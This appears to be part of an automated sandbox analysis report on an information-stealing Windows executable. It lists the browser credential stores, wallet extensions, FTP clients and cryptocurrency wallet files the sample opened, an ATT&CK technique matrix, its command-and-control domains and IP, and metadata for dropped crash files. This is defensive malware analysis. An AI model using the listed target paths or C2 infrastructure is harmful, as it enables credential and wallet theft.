                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeDirectory queried: C:\Users\user\Documents\JDSOXXXWOAJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeDirectory queried: C:\Users\user\Documents\JDSOXXXWOAJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeDirectory queried: C:\Users\user\Documents\NHPKIZUUSGJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeDirectory queried: C:\Users\user\Documents\NHPKIZUUSGJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeDirectory queried: C:\Users\user\Documents\UQMPCTZARJJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeDirectory queried: C:\Users\user\Documents\UQMPCTZARJJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeDirectory queried: C:\Users\user\Documents\IVHSHTCODIJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeDirectory queried: C:\Users\user\Documents\IVHSHTCODIJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeDirectory queried: C:\Users\user\Documents\JDSOXXXWOAJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeDirectory queried: C:\Users\user\Documents\JDSOXXXWOAJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeDirectory queried: C:\Users\user\Documents\UQMPCTZARJJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeDirectory queried: C:\Users\user\Documents\UQMPCTZARJJump to behavior

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                    Source: Yara matchFile source: mWAik6b.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.0.mWAik6b.exe.30000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.mWAik6b.exe.34a9550.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.mWAik6b.exe.34a9550.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000000.2074383446.0000000000032000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2237249132.00000000034A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                    Windows Management Instrumentation
                    1
                    DLL Side-Loading
                    211
                    Process Injection
                    23
                    Virtualization/Sandbox Evasion
                    2
                    OS Credential Dumping
                    1
                    Query Registry
                    Remote Services1
                    Screen Capture
                    21
                    Encrypted Channel
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    PowerShell
                    Boot or Logon Initialization Scripts1
                    DLL Side-Loading
                    1
                    Disable or Modify Tools
                    LSASS Memory231
                    Security Software Discovery
                    Remote Desktop Protocol1
                    Archive Collected Data
                    2
                    Non-Application Layer Protocol
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)211
                    Process Injection
                    Security Account Manager23
                    Virtualization/Sandbox Evasion
                    SMB/Windows Admin Shares41
                    Data from Local System
                    113
                    Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                    Deobfuscate/Decode Files or Information
                    NTDS1
                    Process Discovery
                    Distributed Component Object Model2
                    Clipboard Data
                    Protocol ImpersonationTraffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
                    Obfuscated Files or Information
                    LSA Secrets1
                    File and Directory Discovery
                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Software Packing
                    Cached Domain Credentials22
                    System Information Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Timestomp
                    DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    DLL Side-Loading
                    Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    mWAik6b.exe29%VirustotalBrowse
                    mWAik6b.exe32%ReversingLabs
                    mWAik6b.exe100%Joe Sandbox ML
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    jarry-deatile.bond0%Avira URL Cloudsafe
                    https://cultureddirtys.click/C100%Avira URL Cloudmalware
                    immolatechallen.bond0%Avira URL Cloudsafe
                    pain-temper.bond0%Avira URL Cloudsafe
                    https://cultureddirtys.click/w100%Avira URL Cloudmalware
                    stripedre-lot.bond0%Avira URL Cloudsafe
                    https://cultureddirtys.click/api100%Avira URL Cloudmalware
                    crookedfoshe.bond0%Avira URL Cloudsafe
                    https://cultureddirtys.click:443/apindows100%Avira URL Cloudmalware
                    jarry-fixxer.bond0%Avira URL Cloudsafe
                    growthselec.bond0%Avira URL Cloudsafe
                    cultureddirtys.click100%Avira URL Cloudmalware
                    https://cultureddirtys.click/100%Avira URL Cloudmalware
                    https://cultureddirtys.click:443/apiles100%Avira URL Cloudmalware
                    https://cultureddirtys.click/apiC100%Avira URL Cloudmalware
                    strivehelpeu.bond0%Avira URL Cloudsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    cultureddirtys.click
                    172.67.150.129
                    truetrue
                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      jarry-deatile.bondtrue
                      • Avira URL Cloud: safe
                      unknown
                      immolatechallen.bondtrue
                      • Avira URL Cloud: safe
                      unknown
                      stripedre-lot.bondtrue
                      • Avira URL Cloud: safe
                      unknown
                      jarry-fixxer.bondtrue
                      • Avira URL Cloud: safe
                      unknown
                      pain-temper.bondtrue
                      • Avira URL Cloud: safe
                      unknown
                      crookedfoshe.bondtrue
                      • Avira URL Cloud: safe
                      unknown
                      https://cultureddirtys.click/apitrue
                      • Avira URL Cloud: malware
                      unknown
                      growthselec.bondtrue
                      • Avira URL Cloud: safe
                      unknown
                      strivehelpeu.bondtrue
                      • Avira URL Cloud: safe
                      unknown
                      cultureddirtys.clicktrue
                      • Avira URL Cloud: malware
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://cultureddirtys.click/CmWAik6b.exe, 00000002.00000002.2277537994.0000000001420000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      unknown
                      https://cultureddirtys.click:443/apindowsmWAik6b.exe, 00000002.00000002.2277309695.00000000013BA000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      unknown
                      http://upx.sf.netAmcache.hve.6.drfalse
                        high
                        https://cultureddirtys.click/wmWAik6b.exe, 00000002.00000002.2277537994.0000000001420000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        https://cultureddirtys.click/apiCmWAik6b.exe, 00000002.00000002.2277309695.00000000013C8000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        https://cultureddirtys.click:443/apilesmWAik6b.exe, 00000002.00000002.2277309695.00000000013BA000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        https://cultureddirtys.click/mWAik6b.exe, 00000002.00000002.2277537994.0000000001420000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        172.67.150.129
                        cultureddirtys.clickUnited States
                        13335CLOUDFLARENETUStrue
                        Joe Sandbox version:42.0.0 Malachite
                        Analysis ID:1590828
                        Start date and time:2025-01-14 16:14:15 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 4m 45s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:10
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:mWAik6b.exe
                        Detection:MAL
                        Classification:mal100.troj.spyw.evad.winEXE@6/5@1/1
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 96%
                        • Number of executed functions: 38
                        • Number of non-executed functions: 109
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                        • Excluded IPs from analysis (whitelisted): 20.42.65.92, 40.126.32.68, 13.107.246.45, 20.109.210.53
                        • Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, otelrules.azureedge.net, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                        TimeTypeDescription
                        10:15:09API Interceptor7x Sleep call for process: mWAik6b.exe modified
                        10:15:24API Interceptor1x Sleep call for process: WerFault.exe modified
                        No context
                        No context
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        CLOUDFLARENETUShttps://mercedesinsua.com.ar/?infox=Ymxha2Uuc2lyZ29AY290ZXJyYS5jb20=Get hashmaliciousHTMLPhisherBrowse
                        • 188.114.96.3
                        http://secure.ezpassbgy.top/payGet hashmaliciousUnknownBrowse
                        • 104.21.15.205
                        https://2ol.itectaxice.ru/Qm75/Get hashmaliciousUnknownBrowse
                        • 104.17.25.14
                        m68k.elfGet hashmaliciousUnknownBrowse
                        • 172.68.102.177
                        https://forms.office.com/e/xknrfCPQkRGet hashmaliciousHTMLPhisherBrowse
                        • 188.114.96.3
                        https://bankersonline.emlnk1.com/lt.php?x=3DZy~GDKVXafEpOq0AE4hRad~XEkk_HzluhlXXTGVXjNDHz~_Uy.0eht1H_zk_D2kvY3bHHJJ3ab62Get hashmaliciousUnknownBrowse
                        • 104.16.117.116
                        https://forms.office.com/e/xknrfCPQkRGet hashmaliciousHTMLPhisherBrowse
                        • 104.17.25.14
                        https://forms.office.com/e/xknrfCPQkRGet hashmaliciousHTMLPhisherBrowse
                        • 104.17.25.14
                        Employee_Salary_Update.docxGet hashmaliciousUnknownBrowse
                        • 104.17.25.14
                        https://forms.office.com/e/xknrfCPQkRGet hashmaliciousHTMLPhisherBrowse
                        • 104.17.25.14
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        a0e9f5d64349fb13191bc781f81f42e1lumma1.exeGet hashmaliciousLummaCBrowse
                        • 172.67.150.129
                        VRO.exeGet hashmaliciousUnknownBrowse
                        • 172.67.150.129
                        VRO.exeGet hashmaliciousUnknownBrowse
                        • 172.67.150.129
                        e0691gXIKs.exeGet hashmaliciousUnknownBrowse
                        • 172.67.150.129
                        Y4TyDwQzbE.exeGet hashmaliciousUnknownBrowse
                        • 172.67.150.129
                        DYv2ldz5xT.exeGet hashmaliciousUnknownBrowse
                        • 172.67.150.129
                        rBFTGm5ioO.exeGet hashmaliciousUnknownBrowse
                        • 172.67.150.129
                        DYv2ldz5xT.exeGet hashmaliciousUnknownBrowse
                        • 172.67.150.129
                        No context
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):0.8880884374839403
                        Encrypted:false
                        SSDEEP:96:JZFju2Jc7tsog0HjTOAqyS3QXIDcQlc6VcEdcw3F+BHUHZ0ownOgHkEwH3dEFYRP:n02c7tXeA0LR3Ua2GzuiFUZ24IO8N
                        MD5:332D50B3FCC4F1B9E3614680C47C112F
                        SHA1:4243F226F898D86F4585A18BAF8F5DC8E21E7AA5
                        SHA-256:243771C27BC193A198B71D07715B38F8F6DFD8E6080F6C8082FE5F0990050870
                        SHA-512:D7216A3F621105C81DED49AA1C406AC5F20336C34FB052B2CE84F84DBB2172963B9ED44A06E337ECF487FC6576D8369130C0604531A879BC3C7867F823191BA7
                        Malicious:true
                        Reputation:low
                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.3.4.1.3.0.9.2.3.2.0.1.8.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.1.3.4.1.3.0.9.7.7.8.9.0.0.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.a.d.b.1.a.d.0.-.0.5.2.5.-.4.e.4.7.-.8.4.8.b.-.7.c.5.f.4.1.c.2.9.b.2.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.3.b.5.c.c.a.b.-.c.3.8.1.-.4.e.9.d.-.8.1.e.2.-.d.2.b.d.3.8.d.2.6.e.6.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.m.W.A.i.k.6.b...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.H.a.n.d.l.e.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.b.8.0.-.0.0.0.1.-.0.0.1.4.-.6.4.0.4.-.2.4.1.9.9.7.6.6.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.b.7.6.0.a.9.d.a.9.4.f.1.f.3.a.d.5.1.8.8.d.7.a.e.e.2.1.7.d.4.7.0.0.0.0.0.0.0.0.!.0.0.0.0.8.c.4.b.9.3.5.0.4.0.1.5.8.b.1.b.a.6.5.a.5.9.9.4.1.3.b.1.4.e.8.d.9.e.3.b.9.7.5.e.!.m.W.A.
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Mini DuMP crash report, 15 streams, Tue Jan 14 15:15:09 2025, 0x1205a4 type
                        Category:dropped
                        Size (bytes):155381
                        Entropy (8bit):3.7104953619325167
                        Encrypted:false
                        SSDEEP:1536:TVepN4uE2aODoLTg1A+XQCD6tT97hNuBojR3CC+H:Tm4uEqELTgl7k7rypH
                        MD5:9EDF37002B03493CB43F99CF761987C5
                        SHA1:1A8CCD70E04527F2EB69DB82065E305E44D5D926
                        SHA-256:354A755903F2FCA731500C4A7699FD603AF05B4928BC334F69AA54FC730D43C9
                        SHA-512:AB0760D23EFA9267013BA1C8E0D791B3DF0849D56B777AB1E99A6FEE30626332714BBA97047887911878B23C3D458DCBC4827424F3757A85470B5768D0DAF4A8
                        Malicious:false
                        Reputation:low
                        Preview:MDMP..a..... .......}..g....................................$................/..........`.......8...........T...........x$..}:......................................................................................................eJ......P.......GenuineIntel............T...........|..g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):8370
                        Entropy (8bit):3.690313764003803
                        Encrypted:false
                        SSDEEP:192:R6l7wVeJPjr60P6YEIMSUvZ/gmfawVJNprB89biNsf52m:R6lXJ7r6U6YEDSUB/gmffVJ+iGfx
                        MD5:201ECB0EA18F546D7DA356BE9CC33DE0
                        SHA1:1456997D86962079DF8FFEFDF1F71C828898E683
                        SHA-256:CEA131FE68DD8F008447D0688BC36B10C48DD042542CD0C9B893B3F1E1DD4594
                        SHA-512:99D21190A231E72B9567A94A2867CA4C1177ED0833A8E3719F3F303DB59CE33BD0418FB87FA538F34D757F70E16810EF0BED1D7EDAC89CB23456203C92684434
                        Malicious:false
                        Reputation:low
                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.9.4.4.<./.P.i.
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):4735
                        Entropy (8bit):4.443859365705223
                        Encrypted:false
                        SSDEEP:48:cvIwWl8zsDJg77aI9nkWpW8VY/oYm8M4JodxPcf6Fuj+q8vodxPcfxQrYBd:uIjfdI7N97VUJZf5jKZfxQrYBd
                        MD5:9A2FBEC6ADB9BCE93923310FC7889CC8
                        SHA1:488E5B4E47A9C97879C10C836C824DBB431BF9D9
                        SHA-256:832EEEFAC8B22CD8E9FDFADF28DE7DF204D9EEA9B11BAB7E8A31D7336B6B8798
                        SHA-512:4A44DA541ED8C4262EA72D9B46B1DCEE63481C6523BC8116DA7808AE66B4059A0AC5E8A9CF0803A236A657977AF9A0457B987D58E3A506C50FE7A7759B4723D0
                        Malicious:false
                        Reputation:low
                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="675737" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:MS Windows registry file, NT/2000 or above
                        Category:dropped
                        Size (bytes):1835008
                        Entropy (8bit):4.421704737812632
                        Encrypted:false
                        SSDEEP:6144:kSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnN/0uhiTw:vvloTMW+EZMM6DFy503w
                        MD5:15C8FBD569466BA0705074060287773A
                        SHA1:1BA5DF26BA1685FB2C09049D78778864DCA85FF2
                        SHA-256:64496447304B4D65944E5C38D23FDA41C98A8BE31C328F5EBD3DC4437A8B8192
                        SHA-512:B1C81514EDC493081AEB5A013E0906380C54A82A9DD258485E0A8098F50665ABC5D70FEEC9C02B3606DA7F5E757EEBC00313A7720F1B4040A0DCB9E90374FB5C
                        Malicious:false
                        Reputation:low
